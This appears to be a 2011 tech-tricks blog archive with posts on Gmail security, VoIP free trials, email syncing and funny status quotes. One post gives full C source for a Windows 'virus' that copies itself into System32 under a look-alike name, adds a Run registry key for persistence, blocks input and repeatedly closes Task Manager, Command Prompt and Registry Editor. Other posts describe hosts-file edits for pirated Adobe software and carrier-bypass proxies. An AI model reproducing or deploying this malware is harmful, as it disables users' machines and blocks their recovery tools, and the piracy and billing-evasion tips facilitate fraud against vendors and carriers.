Monday, 12 September 2011

How to Secure your Gmail Account from Hackers

All of us have our Email Accounts on GmailYahooHotmail etc.Phising and hacking are on the rise and many of us have already faced the situtaions when our email Id has been compromised.It is very difficult to estimate the loss which one undergoes once his email ID has been hacked.
Now you can add an extra layer of security in your Gmail Account.After enabling this feature you have to enter an addtional verification code (sent to your mobile) to login into your account.So,if somebody hacked your password even then he won’t be able to access your email account.
How to Secure Gmail Account:-
Capture11 How to Secure your Gmail Account from Hackers
  • Choose a verification method.By selecting Text message (SMS) or voice call you will recieve the verification code on you phone either as text message or as a call.
61 How to Secure your Gmail Account from Hackers
  • Enter the appropriate information about your country and Mobile Number.
126 How to Secure your Gmail Account from Hackers
  • Choose SMS text message or Voice call option according to your need. (I prefer SMS text message).
  • After giving your mobile number test your phone by clicking on the Send Code button.
133 How to Secure your Gmail Account from Hackers
  • Now you will receive a verification code on your given mobile number and type that code in the verification field and click on Verify button.
  • After verifying your number click on the Next button.
If you lost your mobile or your number is not available when you need it. For this you can save backup codes in to your computer.
  • Click on Next button again.
  • Here you will see 10 Backup verification codes. Choose Print codes or Save to text file option whatever you like but keep it safe and don’t lose it.
  • Check mark the box and click on Next button.
16 How to Secure your Gmail Account from Hackers
  • Here give your working alternative number. And click on Next button.
  • Now again click on the Next button again and then click on the Turn on 2-step verification button.
5 How to Secure your Gmail Account from Hackers
  • Click OK.
That’s it ! Now you have been added 2-step verification security to your Gmail account. Now whenever you will enter your password it will ask you to enter verification code without it you won’t be able to login to your Gmail Account.

Sunday, 29 May 2011

Best Funny Facebook Status Updates Collection

Most of the times facebook status updates reflects the actual mood of the person.Are you in a lighter mood and ready to have some laughs? These are some of the facebook status updates and will surely bring a smile on your face.
Here is the best collection of funny status updates for your facebook profile
“Bart, with $10,000, we’d be millionaires! We could buy all kinds of useful things like…love!”
Funny facebook update, Homer J Simpson.
“When I die, I want to go peacefully like my Grandfather did, in his sleep — not screaming, like the passengers in his car”
Funny facebook update,Unknown.
“I’m an excellent housekeeper. Every time I get a divorce, I keep the house.”
Funny facebook update,Zsa Zsa Gabor
“I remmember the time I was kidnapped and they sent a piece of my finger to my father. He said he wanted more proof.”
Funny facebook update,Rodney Dangerfield
“People think it must be fun to be a super genius, but they don’t realize how hard it is to put up with all the idiots in the world,” Calvin.
“Isn’t your pants’ zipper supposed to be in the front?” Hobbes.
Funny facebook update,Calvin and Hobbes.
“Cheese… milk’s leap toward immortality.”
Funny facebook update, Clifton Fadiman.
“Never stand between a dog and the hydrant.”
Funny facebook update,John Peers.
“You have a cough? Go home tonight, eat a whole box of Ex-Lax, tomorrow you’ll be afraid to cough.”
Funny facebook update, Pearl Williams.
“Why does Sea World have a seafood restaurant?? I’m halfway through my fish burger and I realize, Oh man….I could be eating a slow learner.”
Funny facebook update, Lyndon B. Johnson.
“He’s so optimistic he’d buy a burial suit with two pairs of pants.”
“A word to the wise ain’t necessary – it’s the stupid ones that need the advice.”
-Bill Cosby
“I do not like broccoli. And I haven’t liked it since I was a little kid and my mother made me eat it. And I’m President of the United States and I’m not going to eat any more broccoli.”
-George Bush
“Marriages are made in heaven. But so again, are thunder and lightning.”
-Adam Marshall
“ My son is now an entrepreneur.Thats what you are called when you dont have a job.”
-Ted Turner
“If your parents never had children, chances are you won’t, either.”
-Dick Cavett
“Hey! You have a penny on your crotch”.”
-Exclaims Kelly
“A cynic is just a man who found out when he was about ten that there wasn’t any Santa Claus, and he’s still upset.”
-James Gould Cozzens
“We are all either fools or undiscovered geniuses.”
-Bonnie Lin
“A bartender is just a pharmacist with a limited inventory.”
-Albert Einstein
“ To err is human, but to really foul things up you need a computer.”
-Paul Ehrlich

Saturday, 28 May 2011


*Create a thread that runs WHILE your other code runs
*Block and Destroy Task Manager and other windows
*ShellExecute (basics, nothing fancy)
*Turn Off/On The Monitor
*Make The Mouse Go Crazy
*Viruses are fun :lol: :lol:
Some Tips
always remember that these virus piss people off, there for please don’t name them anything like “svchost” or something that the computer HAS to have to run. If you ever got infected you would want to Babel to find the virus. Names don’t mater, but what you should do is the take a name of a program and add or change a letter (in the examples i use “winminer.exe”, instead of “winmine.exe”).
also, try to keep your code clean, the “int main()” should be the smallest part of your program. always split stuff up into voids or other stuff.
1: Creating A Thread (CreateThread())
now im not to good at this, but Threads are VERY useful. think of it like this, a normal program runs line by line, or command by command. a Thread will make a create a separate line of commands apart from the others.
CODE C Language
view source
01 DWORD WINAPI DestroyWindows(LPVOID)
02 {
03 //your code would go here
04 }
06 int main()
07 {
08 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
09 while(1)
10 {
11 Sleep(10);
12 }
13 }
a Thread will not keep the program running, so after you make your thread you need to make sure that the program will still run.
Destroying Task Manager and other Windows
now this is really easy and not hard to understand. to find the task manager window or other windows all you have to do is use the “FindWindow()” function.
CODE C Language
view source
1 HWND TaskMgr;
2 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
so now all you have to do is tell it to do something to the window…
CODE C Language
view source
1 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
2 if( TaskMgr != NULL )
3 {
4 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
5 }
first it will try to find task manager, then if its found it sends it a message to close the program. easy rite? :D
ShellExecute() is a function that will execute other programs ( ShellExecute). you can execute almost anything will this function using this code
CODE C Language
view source
1 char Notepad[MAX_PATH]=”notepad.exe”;
2 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
that code will open up a blank notepad. you can also use other things like “char Website[MAX_PATH] = “http:\\”, that will open up google in your browser.
Turn Off/On The Monitor
this code i just recently learned from using the most powerful tool on earth, GOOGLE, you can use it to turn off the monitor (not the computer) or turn it back on.
CODE C Language
view source
2 Sleep(5000);
that code will turn the monitor off, wait 5 seconds, then turn it back on. simple.
Making The Mouse Go CRAZY
this is really simple to learn also. you just have to make 2 random variables (x, y) and then tell the mouse to go to them.
CODE C Language
view source
1 X = rand()%801;
2 Y = rand()%601;
3 SetCursorPos( X, Y );
that would make X a random number 0 – 800, and Y a random number 0 – 600. then it sets the mouse to that position.
Viruses are fun :lol: :lol:
well that all for now. here is a simple virus i made using the functions from this tutorial and my other past tutorial.
CODE C Language
view source
001 #include <iostream>
002 #include <stdio.h>
003 #include <windows.h>
004 #include <winable.h>
005 #include <conio.h>
006 #include <ctime>
007 using namespace std;
009 int random, Freq, Dur, X, Y;
010 HWND mywindow, TaskMgr, CMD, Regedit;
011 char Notepad[MAX_PATH]=”notepad.exe”;
012 char MineSweeper[MAX_PATH]=”winmine.exe”;
013 char Hearts[MAX_PATH]=”mshearts.exe”;
014 char Website[MAX_PATH]=”http:\\”;
016 void SetUp();
017 void Run( int ID );
018 void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
020 DWORD WINAPI DestroyWindows(LPVOID);
022 int main()
023 {
024 srand( time(0) );
025 random = rand()%6;
026 system(“title :.Virus.:”);
027 BlockInput( true );
028 SetUp();
029 BlockInput( false );
030 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
031 while(1)
032 {
033 Run( random );
034 Sleep(10);
035 }
036 }
037 void SetUp()
038 {
039 char system[MAX_PATH];
040 char pathtofile[MAX_PATH];
041 HMODULE GetModH = GetModuleHandle(NULL);
042 GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
043 GetSystemDirectory(system,sizeof(system));
044 strcat(system,”\\winminer.exe”);
045 CopyFile(pathtofile,system,false);
047 HKEY hKey;
048 RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey );
049 RegSetValueEx(hKey, “SetUp”,0,REG_SZ,(const unsigned char*)system,sizeof(system));
050 RegCloseKey(hKey);
052 mywindow = FindWindow(NULL,”:.Virus.:”);
053 cout<<”You Are Doomed”;
054 Sleep(1000);
055 ShowWindow(mywindow, false);
056 }
058 void Run( int ID )
059 {
060 if( ID == 1 )
061 {
062 BlockInput(true);
063 }
064 else if( ID == 2 )
065 {
066 Beeper();
067 }
068 else if( ID == 3 )
069 {
070 OpenStuff();
071 }
072 else if( ID == 4 )
073 {
074 Hibernation();
075 }
076 else if( ID == 5 )
077 {
078 CrazyMouse();
079 }
080 else
081 {
082 BlockInput(true);
083 Beeper();
084 OpenStuff();
085 CrazyMouse();
086 }
087 }
089 void Beeper()
090 {
091 Freq = rand()%2001;
092 Dur = rand()%301;
093 Beep( Freq, Dur );
094 }
095 void OpenStuff()
096 {
097 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
098 ShellExecute(NULL,”open”,MineSweeper,NULL,NULL,SW_MAXIMIZE);
099 ShellExecute(NULL,”open”,Hearts,NULL,NULL,SW_MAXIMIZE);
100 ShellExecute(NULL,”open”,Website,NULL,NULL,SW_MAXIMIZE);
101 }
102 void Hibernation()
103 {
104 Sleep(1000);
106 }
107 void CrazyMouse()
108 {
109 X = rand()%801;
110 Y = rand()%601;
111 SetCursorPos( X, Y );
112 }
114 DWORD WINAPI DestroyWindows(LPVOID)
115 {
116 while(1)
117 {
118 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
119 CMD = FindWindow(NULL, “Command Prompt”);
120 Regedit = FindWindow(NULL,”Registry Editor”);
121 if( TaskMgr != NULL )
122 {
123 SetWindowText( TaskMgr, “You Suck Balls Superman”);
124 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125 }
126 if( CMD != NULL )
127 {
128 SetWindowText( CMD, “You Suck Balls Superman”);
129 PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
130 }
131 if( Regedit != NULL )
132 {
133 SetWindowText( Regedit, “You Suck Balls Superman”);
134 PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
135 }
137 Sleep(10);
138 }
139 }
Quick description: i created a thread that looks for Task Manager, CMD, and Regedit. When it finds 1, it closes it. i also made the virus do random things, so every time you restart your computer you get a new effect.
Note:This is for educational purpose only…

Friday, 27 May 2011


This trick works on both 2G and 3G networks.You must have Browser in-order to use the trick i would recommend to use the Opera browser for PC.If you don’t have opera browser you may download it from the official website and install it.
After you installed the Opera go to Tools then Preference and open Advanced Finally click Network option.Now click on proxy server.Pick (or) check HTTP box.

In the HTTP box write and enter the port address as 80 and Save It.
Now in Address bar type .Now the proxy site may open and enter the  URL which you want to browse or Download.
The drawback of this trick is given proxy doesn’t supports for JavaScript.For example you mayn’t able to chat in Facebook. coupon code - 2 Euro free trial for web callback

What is the easiest way of making International call? Answer is Call Back. Today we will discuss about which provides Direct dial numbers and free webcallback for making international calls. They are giving 2Euro credit for new signups with special Hiboo coupon code. No credit card or purchase required. is a French service provider. They provide international call solutions based on callback system. Main highlights are -
  • High quality calls using callback system
  • Get direct dial Belgium number for your international numbers (you don`t pay for call to that Belgium number)
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How to Signup with to get 2Euro free credit
STEP 1: Goto homepage and click on Signup now on left panel
STEP 2: Enter the Promotional code - 2€TEST and fill other information

Don`t go further to make any payment. You will receive an email containing your login information within 10 minutes. Please check your spam box also if you don`t get it.

You can now login with provided user info in email. You can see 2euro credit on my account.

How to make calls using
Method 1 : You can make call by logging in to and click on webconnect calls on left pane. You need to enter your phone number and your friend`s mobile number.
Method 2 : You can set a direct number for any international number. Just call direct number. Hiboo system will cut your call and give you a call back to connect you to your friend.
Method 3 : Dial             +3224024588      , hiboo system will cut your call and you will receive callback. Now hiboo system will ask you to enter the number you wan to call.

Please note that you will not be charges for making calls to hiboo numbers because hiboo system will never lift your call.

Please use comment channel if you face any problem in signup or trial credit.


Where can i get New High Speed proxy server for Tata Docomo with Resume Support?
  • First of all you must have Tata Docomo Dive In settings to use this trick.If you don’t have one you may read here.
  • Now open any Handler Application whether it may Opera Mini or UCWEB.
  • When you run the Modded Application it shows Operator Trick menu.
  • Now scroll down until you find the option Proxy Type.Select Proxy Type and you may enter the any one proxy given here.But we can’t give guarantee that all proxies will work.Be sure you have read or Disclaimer.
  •  (checked and working)
    1.   (Working fine)
You must maintain minimum balance of Rs.1 and the default activated settings should be Tata Docomo Dive In.You may also try it in both 2G and 3G networks.

Download BackTrack 5 for free

If you are interested in hacking and penetration testing, I’m sure you know about going backtrack. This operating system is used for penetration testing. Backtrack 5 is now released and available for download. BackTrack is for all public safety professionals smarter soon newcomers to the field of information security. BackTrack promotes a quick and easy to find and update the database’s largest collection of security tools daily.
Our broad user community expert penetration testers in the field of information security, government agencies, information technology, security enthusiasts and people new to security community.This new revision has been built from scratch, and has several significant improvements in all our previous Ubuntu LTS releases.Based lucid. Kernel 2.6. 38, patched with all relevant wireless injection patches. Fully open source and compatible with GPL.

Edit Hosts File in Windows 7 XP to Block Websites

A lot of software cracks will usually allow you to run an application which edits your hosts file, usually in an effort to block your computer from accessing the software’s registry server. However, many of these hosts-patching programs have problems or downright fail at editing the hosts file for certain Windows operating systems. The good news is you can patch the hosts file yourself, as long as you know the URL of the site you wish to block or redirect.
Editing the Hosts File (Windows 7)
  1. Click on the Start (Windows) button
  2. Click on Computer
  3. Navigate through Windows Explorer through the following folders:
    1. C:/
    2. Windows/
    3. System32/
    4. drivers/
    5. etc
  4. In “etc” folder, select the hosts file and copy and paste it to your desktop.
  5. Double click on the hosts file in your desktop
    1. Select to open it through Notepad
  6. Make edits to it in Notepad
  7. Save using Ctrl+S
  8. Drag and drop the hosts file back into the “etc” folder
  9. Select “move and replace file” to overwrite the original file
Your hosts file should look something like this:
Edit Hosts File in Windows 7 XP
Blocking Websites
To block a website, you simply add the following to the bottom of the hosts file in Notepad:
So if I wanted to block MySpace, I would type:
And then I would get this if I typed into a browser:
Edit Hosts File in Windows 7 XP

It will not load the page until I change the hosts file. A lot of people who pirate Adobe software will patch the host file in this same fashion, typing:
You can patch your hosts file for entirely legal reasons too. Many people will edit their hosts file to block bad or unwanted websites that could harm their computer. In fact, here is a long, extensive list of bad websites that are already prepped to be blocked in your hosts file. Simply download the text document, copy the blocking website codes, and paste it into your hosts file.
However, be sure, if using one of these lists of designed to patch your host file, that all the websites are preceded with the code: That’s an IP address that defaults to nowhere. Just a blank page. If there is any other IP address in the code, don’t trust it. It could be redirecting you to bad sites filled with viruses and terrible things for your computer.

HeyWire Send/Receive Free Unlimited international SMS for iPhone Android PC & Free US phone number

We had discussed several online free SMS services on FreeVcalls like, Tamevo & Jubin Free SMS tool. Today we will discuss about Heywire which allows you send and receive free international SMS, IM from iPhone, Android or PC web along with a free US phone number for SMS.

Main Features of Heywire -
  • Text to friends with SMS capable phones
  • Friends do not need HeyWire App to reply
  • Real HeyWire U.S. Phone Number included Free!
  • 100% Coverage in USA, Canada, Mexico & Mainland China, 75%+ Coverage in South & Central America and Caribbean - Brazil, Chile, Argentina, Peru, Uruguay, Paraguay, Ecuador, Panama, Costa Rica, Belize, Nicaragua, Honduras, United States Virgin Islands (USVI), British Virgin Islands (BVI), Puerto Rico, Jamaica, St. Kitts and Nevis, Trinidad & Tobago, Dominica, Bahamas, Aruba, Curacao, Bonaire, Barbuda, St. Lucia, Sint Maarten, Cayman Islands, Antigua, Anguilla, Barbados, Northern Mariana Islands, Turks & Caicos Islands, Monserrat, Grenada, Bermuda, Suriname, Ecuador, Guyana, Bolivia, El Salvador, Guatemala, Venezuela, Columbia
  • GROUP MESSAGING - Send 1 message to 10 friends via SMS, IM, Facebook Chat.
  • Use it from iPhone, Android or any PC web.
You can download Heywire application from iTunes or Android market for free. Just visit Heywire website and download it.

How to use Heywire from PC web - Just log in to

Thursday, 26 May 2011

How to Sync Your Desktop Email Client (Outlook or Thunderbird) Across Multiple Computers

If you use webmail like Gmail or Hotmail, there's really no syncing needed to keep your email coordinated across multiple computers—open up your web browser on any computer and everything is just as you left it. Those of us who prefer—or are required to use—a desktop program like Microsoft Outlook or Thunderbird, however, have to work a little harder to get our emails, contacts, calendar events, and tasks synchronized across multiple devices. Here's how to set it up.
You've got several ways you could go about syncing your desktop email client between computers, but the best, most complete method involves storing your application profile in a file-syncing tool like Dropbox so that all of your settings are automatically synced between your computers. Here's how to move your Microsoft Outlook PST file or the profile for cross-platform Thunderbird to accomplish that goal.

Why not just use IMAP?

If your email account can use the IMAP protocol, this is the easiest way to have your email synced; IMAP syncs even your sent email with the email server. However, some companies or service providers require you to use POP3; with POP3 you can change a setting to save emails on the server, but your sent emails aren't synced.
Another reason to go the Dropbox route is to sync your settings and other items, such as tasks, in your Outlook or Thunderbird program across all your computers.

How to Move Your Outlook PST Files to Dropbox

Dropbox works great as a syncing solution for Outlook especially, since the PST file is stored and accessed on your local drive; storing the PST file on a network share, by contrast, can result in really bad performance problems or corruption of the file. Dropbox is also one of the few programs that can accomplish this syncing without a lot of hassle.
The instructions below are using Outlook 2010 on Windows 7. The exact menus may not be the same in older versions, but you should be able to find similar commands.
  1. To move your Outlook PST file, first you'll need to find it. In Outlook 2010, you can right-click on Personal Folders and choose "Open File Location" to see the file in Windows Explorer.
    Alternately, you can go to your Control Panel > Mail settings (if you have trouble finding it, look under User Accounts or simply search for "Mail" within the Control Panel). Click on the "Data Files... button" and in the new window, you'll be shown the location of the PST file. (Usually it's under C:\Documents and Setttings\[username]\Local Settings\Application Data\Microsoft\Outlook.)
  2. Close Outlook, then go to Windows Explorer and cut and paste the file to your Dropbox folder.
When you next open up Outlook, you may be warned that the PST file can't be found. Click OK, then browse to your Dropbox folder to find the new location.
You may also have to change where the emails get stored:
  1. Click on the File tab, then Info.
  2. Under Account Settings, click Account Settings.
  3. On the E-mail tab, select the account and click Change Folder.
  4. Select the Inbox to change the email delivery location.
From your other computer(s), point Outlook to the Dropbox data file by going again to the File tab in Outlook > Account Settings. In the Data Files tab, add the moved PST file, set it as the default, and remove the old location. There are a few caveats to this approach:
  • You'll need to close out of the Outlook program on the first computer before opening the PST file on the second one. This is very important! Dropbox is pretty good at creating duplicate, "conflicted" copies of the PST files if necessary, but constant syncing attempts of an open PST file can lead to corruption. So close out of Outlook and let Dropbox do its syncing before you open Outlook on the next computer.
  • If your Outlook file is very big, you could run out of space in your Dropbox account. Keep this in mind, and you may either want to upgrade your account or follow our cheapskate's guide to getting more free space on Dropbox.

Move Your Thunderbird Profile to Dropbox or a Shared Network Folder

If you're using the cross-platform Thunderbird email client, you could move your profile to an external drive (like a USB thumbdrive), but that requires carrying around that USB stick and bringing it to each computer you need to access.
The better option is to move your profile to a new shared location—either a shared network folder or your Dropbox folder. Here are the instructions for moving the profile.
  1. First make sure Thunderbird isn't running.
  2. Next, find the profile folder. On Windows, the default location is in C:\Users\[username]\AppData\Roaming\Thunderbird\Profiles\ or C:\Documents and Settings\[username]\Application Data\Thunderbird\Profiles.

    On Mac, the location is ~/Library/Thunderbird

    On Linux, the path is ~/.thunderbird/
  3. Cut and paste the xxxxxxxx.default folder to your new location (e.g., Dropbox folder)
  4. Next, edit the profiles.ini file in a text editor. You'll find the file in the same location as the profiles folder above.
  5. Edit the "Path=" line to the new location, e.g., C:\Users\[username]\Documents\Dropbox\xxxxxxxx.default

    When entering a non-relative path in Windows, use backslashes (relative paths get forward slashes), and change IsRelative=1 to IsRelative=0.
  6. Save the profiles.ini file and restart Thunderbird.
On your other computers, you can copy over the profiles.ini file so they also point to the new location of your Thunderbird profiles folder. That should be it.
(For more information on moving your profile, see Mozilla's Moving your profile folder instructions.)
Note: You could also move the portable version of Thunderbird into your Dropbox folder for speedier access.

There are lots of reasons to use a desktop email program (better offline capabilities, email sorting, and collaboration features depending on your office needs). Lack of support for syncing across multiple computers shouldn't stop you from using Outlook or Thunderbird. Syncing your profile with Dropbox, you can take your desktop email experience with you on all your computers. Free call conferencing and recording

Conference calls plays very important role in Business. There are several services which offers free conference calls. Rondee is one of them but with a difference in free features. Features like call recording, customized greeting and web control are paid for most of the service providers but with Rondee its 100% free.

Rondee is headquartered in Palo Alto, California and was founded in 2006. Main features --
  • Free
  • Easy to set up
  • Conference on-demand 24/7 or schedule in advance
  • Audio recording at no charge
  • Listen-only option
  • Customizable greeting tones and prompts
  • Reporting on who participated
  • Conference upto 50 people
How to use Rondee free call conferencing service -

STEP 1 : Visit Rondee home page and enter your email to sign up
STEP 2 : Check the email which will have a link to finalize your login as well as you Dial in number and pin code
STEP 3 : Complete your signup by clicking on the link

Now you are ready to organize your own conference. You can setup two types of conference calls-

1. On Demand Rondee - Independently set up your own conferencing whenever you want.
2. Scheduled Rondee - Calendar your calls in advance with a powerful scheduling system that e-mails your invitees for you and offers attendance tracking and agenda archival.
3. Rondee Premium service - Toll free service - 5centsmin, Rondee Call Transcription - Manual Review $1 per minute ($20 minimum), Automated Review 10¢ per minute ($2 minimum)

You can also register your phone number for a conference ID so that you don't have to dial it.

Rondee is a excellent and free service which provides host of premium service free of cost. The best part is that you can manage everything thorough online web based system. Rondee has positive reviews from USA today, PC World and many more.

Trick To Lock Your Computer With Usb:PREDATOR

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers,eye scanners,face recognition etc but what about the personal computers?
Using this trick you will be able to lock your computer with a Usb.The computer will work only when the Usb is plugged in.Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark.Moreover your computer will get automatically locked.To unlock the computer you will need to insert the Usb again.
This trick will work on on all versions of windows including both windows 32 bit and 64 bit
Here is the Trick to lock Your Computer With Usb Using Predator

  1. Download predator software by clicking here (2.3 mb)
  2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator
  3. Now Insert your Usb.You will get a message to define your new  password.(This process will not format your pendrive and your pendrive data will not be affected by this at all)
  4. Click on Ok and Enter your your new password in next dialog box
  5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list
  6. Finally click on Create Key button and then on OK button
After this the software will automatically exit.Now restart the program by clicking the icon on desktop.
Predator will take few seconds for initialization.Once the icon in the taskbar turns green then your software has initialized itself.

Learn the Tricks To Earn Money From Facebook

Before you read this post I want that you should ask these question to yourself and continue reading only if you feel that you have a postive response for all these questions?
Have you ever wanted to earn money online?
Have you ever wish to earn big money?
Do you want to earn this money quickly?
Do you want to earn money without investing big amount?
Well if you are still reading this post then you might be changing your life..and ofcourse I am serious.The best way to earn money online is via facebook because it has
  • More than 400 million active users
  • More than 60 million status update posted each day
  • More 35 million users update their status every day
  • More than 3 billion photos uploaded to the site each month
  • More than 5 billion pieces of content shared each week
  • More than 3 million active pages
So, why are you missing such big opportunity to earn online.The tricks to earn from facebook has been tested.
What is Not Required to Earn from Facebook
  • Any Kind of programming Skills
  • Any Complex Stuff
Just follow the tricks mentioned in the ebook and you can earn really BIG.
So what is required on your part?
There is a little effort which you have to put to earn and if you are lazy enough or don’t have the desperation to put some effort to earn then PLEASE STOP READING THIS POST!!
You don’t have to put any extra effort to earn from facebook just follow the tricks explained in the ebook  and then keep counting the money!!
Click here to Download Ebook To Earn Money Facebook

Wednesday, 25 May 2011

Free trial calls credit for SIP web phone & mobiles

VoIP is the cheapest and most convenient way of making calls to your loved ones. VoIP providers are giving multiple option to use service like Webphone, SIP, webcall back, Access numbers. Today we will discuss about Zadarma Project, which if offering all VoIP features with free trial credit without any credit card information.

Zadarma is a service provided by IP Telecom Bulgaria. Main features of Zadarma project VoIP service are -
  • SIP- Telephony
  • Direct numbers for incoming calls to your SIP from 25 countries
  • Webcall back
  • Receive Faxes
  • Free international calls from Mobile SIP clients
  • Free calls to 20 countries including - Argentina, Canada, China, Denmark, France, Germany, Greece, Athens, Hong Kong, Hungary, Ireland, Israel, Kazakhstan: Almaty, Astana, Poland, Puerto Rico, Russia: Moscow, St.Petersburg, Singapore, Spain, Sweden, Thailand, USA, United Kingdom
  • Recharge your account using Credit card, Paypal, Webmoney, Inetkassa or Robokassa

How to get Free trial credit from Zadarma
Please note that you can register from Russia as well as English home page of Zadarma. With Russian page you will get free Trial credit of $0.5 while with English page you will get $0.2 only. Hence We are including registration from Russian page in our steps.
(Use Google toolbar for translating the page to English)

STEP 1 : Visit Zadarma home page (Russian) and click on Registration or goto registration page
STEP 2 : Fill in the details with your correct email ID, Phone number is not mandatory
STEP 3 : You will receive an activation email to your email id, Just click on the activation link and this completes the signup process

Now you can see $0.5 credit in to your account.

How to use Zadarma Free credit
Using PC - You can use Web phone or any SIP software for making calls.
USing Mobile - USe SIP clients like Fring, Nimbuzz or portSIP

Zadarma SIP settings -
Server -
Login - (Check this in Settings>>SIP Settings)
Password - (Check this in Settings>>SIP Settings)
Display name - SIP

Use the SIP number to receive faxes
port: 5060,
useragent: YATE/3.2.0

Free 300 minutes offer from Zadarma
To get 300 free minutes, You have to top up your account on $9.5. Money which You deposit on your account never burns, You can use them at any time for calls on paid directions or after the free minutes end.

Zadarma Communication quality
If you are not satisfied with the quality of conversation with the international number, simply dial 888 before this number and system will automatically switch it to another direction of the international operator. Cost of direction does not change.

Final Words
Voice quality of Zadarma was excellent. The best point which we like about Zadarma is number of options they provide to use your credit. You can give a try to service and refill if you like it.

10 More Experimental Features You Should Enable from the Gmail Laboratory

Background Send (a.k.a., the One New Gmail Labs Feature You Should Definitely Enable)

10 More Experimental Features You Should Enable from the Gmail LaboratoryWe love Gmail, but it can be a tad slow or unresponsive sometimes, and waiting for emails to send can really put a damper on your inbox-clearing momentum. Background Send is one of the coolest labs Gmail's come up with in a long time: it lets you continue on working while Gmail sends mail in the background. If it fails, Gmail will let you know and prompt you to try sending it again. Everyone should enable this feature; it makes using Gmail a whole lot nicer, and makes it act a little more like a desktop client than a webapp.


10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail's Priority Inbox is great for telling you which messages are important, but your "unimportant" messages can still be pretty overwhelming. You probably have your own filters set up, but now Gmail's SmartLabels Lab can keep common types of messages—like bulk mail, notifications or forum messages—labeled and organized in your inbox. It can automatically detect which messages are mass mailings, automatically generated, or sent from mailing lists or groups and label them accordingly, meaning you don't have to keep up those filters yourself. If you don't consider these messages spam, but still want to keep them separate from your other daily emails, this is a great lab to have around.

Unread Message Icon

10 More Experimental Features You Should Enable from the Gmail LaboratoryIt's been a part of our own Gina Trapani's Better Gmail extension for awhile, but Google's finally brought unread count badges to the Gmail favicon. After enabling Unread Message Icon in labs, any Gmail tab you have open should show the number of unread messages in its favicon, so you'll see whenever you have a new message.


10 More Experimental Features You Should Enable from the Gmail LaboratoryIf you cycle through a lot of messages at once, it's probably really annoying that Gmail takes you back to the inbox whenever you delete, archive, or mute a conversation. The Auto-Advance Lab lets you choose what Gmail does in this situation, so you can go straight to the next (or previous) email whenever you delete or archive a message. It's small, but a good time saver and a fix for a pretty big annoyance.

Preview External Services in Messages

10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail has quite a few labs that let you preview things like videos, documents, voicemails, and images in emails if they're sent from certain services. For example, if one of your contacts sends you a link to a Google Doc, the Google Docs Preview Lab will show a preview of it right in the email. Similarly, if someone sends you a message with an address in it, the Google Maps Preview Lab will automatically show you that address on a map. There are also preview Labs for Google Voice, Yelp, Picasa, and Flickr if you or your contacts use those services.

Nested Labels

10 More Experimental Features You Should Enable from the Gmail LaboratoryLabels are incredibly useful for organizing your messages, but there comes a point where you have so many that you need to organize your labels. Nested Labels is a great little feature that lets you create labels in a hierarchy—for example, separating mail into "work" and "personal", and then further separating the personal category into "family" and "friends".

Apps Search

10 More Experimental Features You Should Enable from the Gmail LaboratoryIf you use Google Docs or Google Sites, Apps Search is a great Lab that extends Gmail's search capabilities to those two apps. That way, when you search for something in Gmail, it'll also bring up matching search results from Docs and Sites below the Gmail ones. If you're a heavy Docs user, you'll probably want to check out the Create a Document and Docs Gadget Labs.

Refresh POP Accounts

10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail has a nice feature that lets you consolidate multiple email addresses into one email inbox, but it only refreshes them when it deems necessary, which can be annoying if you know someone's sent you an email that you want to read. The Refresh POP Accounts Lab adds a button to your inbox that refreshes POP accounts on demand, which is a lot easier than refreshing it from Gmail's settings or signing into your other email account.

Sender Time Zone

10 More Experimental Features You Should Enable from the Gmail LaboratoryTime zones are always a pain to figure out, so if you regularly contact folks on the other side of the country, the Sender Time Zone Lab is probably a good one to enable. It will detect your contacts' local time zone and tell you what the local time is whenever you open an email from them. It'll even give you a little phone icon that turns red when it's after 9pm there, so you know it probably isn't a good time to give them a call.

Video Chat Enhancements

Google Chat is one of our favorite video chat platforms, and the Video Chat Enhancements Lab makes it awesome. This lab adds the latest and greatest features to Google Video Chat, which currently includes higher resolution and bigger windows, with more to come in the future. If you use Google Video Chat, there's no reason not to enable this one.

Download Bitdefender Total Security 2012 Beta

Bitdefender total security 2012 beta is now avaliable for public download with various improvements and new features like autopilot, rescue mode, scan dispatcher, file sync and integrated cloud service.
You will not only get the oppurtunity to use bitdefender total security for free but you can also win  one Alienware M14x Laptop, one Samsung Galaxy Tab and one Google Nexus S.These prizes will be given to the most active beta testers.
Here are some of the new features of Bitdefender Total Security 2012
Autopilot:-Autopilot is the new decision making capability in bitdefender that automatically configures the antivirus without taking any input from the user’s via popups,alerts.So you will have a hassle free experience.
Scan Dispatcher:-Scan Dispacher automatically checks your system usage and when it falls below a certain level i.e become ideal then Bitdefender performs the computer scan thus making ideal use of your system and without interfering in user initiated actions.
Rescue Mode :-If bitdefender is unable to remove some of the rootkits from your computer then it will restart your computer in Rescue mode and will remove these rootkits
File Sync:-Files that are placed in Bitdefender safebox are automatically synchronized.If you have same files in your laptop and computer then using File Sync if you make changes in files in either your computer or laptop the changes will be automatically transfered to the other system.
How To Download Bitdefender Total Security 2012 Beta ?
Click the Link Below to goto official Download page
Or use the download link below to download the oflline installer directly
Download Bitdefender 2012 total security offline installer

Monday, 2 May 2011

How to Trace Mobile Numbers

